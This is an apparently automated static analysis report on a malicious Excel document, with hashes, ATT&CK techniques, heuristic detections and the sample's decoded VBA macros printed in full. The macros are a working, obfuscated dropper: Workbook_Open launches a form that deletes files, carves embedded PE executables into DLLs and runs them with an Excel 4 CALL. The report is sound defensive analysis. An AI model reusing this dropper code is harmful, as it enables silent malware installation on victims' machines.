Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29dbeb344c83f046…

MALICIOUS

Office (OLE)

831.0 KB Created: 2020-06-22 10:41:03 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: 2677fc10c3390b124a3083b4e9ef4426 SHA-1: bf64d0f1f8f23f68f32ea9f271fa067f6cb3bb6c SHA-256: 29dbeb344c83f046459576c27adcf9d6f4a4d2cec90979b02a420325d7f125e5
450 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1106 Execution through API T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an Excel document containing VBA macros that trigger on Workbook_Open. These macros utilize Shell() calls and references to Windows Script Host, LoadLibrary, and GetProcAddress APIs to execute an embedded PE executable. This executable is detected by ClamAV as Win.Dropper.Hideproc-6663113-0, indicating its role as a dropper for further malicious payloads.

Heuristics 11

  • ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             sendings = 1
             Dim sNMSP As New Shell
             FlagDouble = True
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    If WelcomeDialog.Visible = True Then
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11007 bytes
SHA-256: 6d5848e5da2487303aa21be6e2bc29ebddbd8c24ae468ac63051e339648f1846
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module0.WuzzyBud 800
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Activate()

End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub


Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property



Attribute VB_Name = "Module0"



Public Sub WuzzyBud(dImmer As Integer)

If WelcomeDialog.Visible = True Then
Exit Sub
End If

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


Dim car As Repositor
    Dim SpecialPath As String
    

PRP = "%" & Dialog4.TextBox1.Tag

Dialog4.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Set car = New Repositor
Dialog4.TextBox3.Tag = car.CheckCar(ActiveHotbit, Dialog4.TextBox3.Tag & "")
ChDir (Dialog4.TextBox1.Tag)
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If
End Sub

Attribute VB_Name = "Module1"
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " ccc" Then
                
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub



Attribute VB_Name = "Module2"







Public Sub DerTip()
    
 Dim sendings As Integer
    dershlep = "" + Dialog4.TextBox1.Tag
    Dim ofbl As String
    Dim sOfbl As String
    ofbl = Dialog4.TextBox3.Tag + "\libConfig"
    Dim CurrentSizeOfAT As Long



ctackPup = Dialog4.TextBox1.Tag + "\mannua"
 ctackPup = ctackPup + "l.xlsx"
        ctackPop = dershlep & Dialog4.TextBox3.Value
        
         Dim arr(1 To 3) As String
     
ctackPip = ctackPup & Page11.Range("A115").Value
 
 PublicResumEraseByArrayList ofbl + "*", ctackPop, ctackPip
 
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True
              
         Lrigat = Dialog4.Label11.Tag
         
        
        If sendings > 0 And sendings > -30 Then
         
            Set DestinationKat = sNMSP.Namespace(dershlep)
            Set harvest = sNMSP.Namespace(ctackPip)
          
          
        End If


DestinationKat.CopyHere harvest.Items.Item(Lrigat)
   
   
   
   
   
   For StepBit = 1 To 2
 
    CurrentSizeOfAT = 328192
      sendings = 1
            sendingsCSTR = "1"
        If FlagDouble Then
                CurrentSizeOfAT = 200000 + 60600 + 8
                sendings = 2
                FlagDouble = False
            sendingsCSTR = "2"
            End If
       
            
            sOfbl = ofbl + sendingsCSTR + ".dll"
 Composition dershlep & Dialog4.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
       
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        If -100 <= sendings Then
            sendings = sendings + 1
            ChDir Dialog4.TextBox3.Tag
            sendings = sendings + 1
        End If
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        sOfbl = """" + sOfbl & ""","""

   varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "runday"",""J"")")
   If IsNumeric(varRes1) Then
    If varRes1 = 0 Then
        Exit Sub
    End If
    End If
   
Next
        
End Sub





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub


Attribute VB_Name = "Module4"




 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub




Attribute VB_Name = "Module5"
 Public DisputeChannel3 As Byte
     
Public HurricanMoes() As Byte

     
    Public abbrev As Byte
 Dim DecemberUpdate As Byte
 
 




Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim HurricanMoes(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim fuZzy As Integer
 fuZzy = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 HurricanMoes(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 HurricanMoes(2) = DisputeChannel3
 Get DisputeChannel1, , DecemberUpdate
 If DecemberUpdate = ThirdB Then
 HurricanMoes(3) = DecemberUpdate
 If fuZzy = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 HurricanMoes(k) = abbrev
 Next k
 Exit Do
 Else
 fuZzy = fuZzy + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 zeroBob = 1
 For i = zeroBob To UBound(HurricanMoes)
 If WelcomeDialog.Enabled = True Then

 Put #DisputeChannel1, , HurricanMoes(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub




Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{466D64D5-C28A-40CF-9B6E-979786F07EBA}{3B9877C1-D161-4596-B086-1A549513FECB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{92A9393B-3F5E-470D-B46C-19191FCC4246}{C8B3DF52-2EFF-4BDF-A0C1-BAF16B946ADC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub





Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
embedded_office_00001b53.exe embedded-pe Office MZ+PE at offset 0x1B53 843949 bytes
SHA-256: 3377abb8ea2fb738a5057812eaef36146f1d2d329e0357b442131f3efae6ed86
Detection
ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: MBD00D73BAE/Ole10Native 593311 bytes
SHA-256: b1fa392bb373223ddc3daa16b23f155332e3196967318068a95ad72d6d72c0a9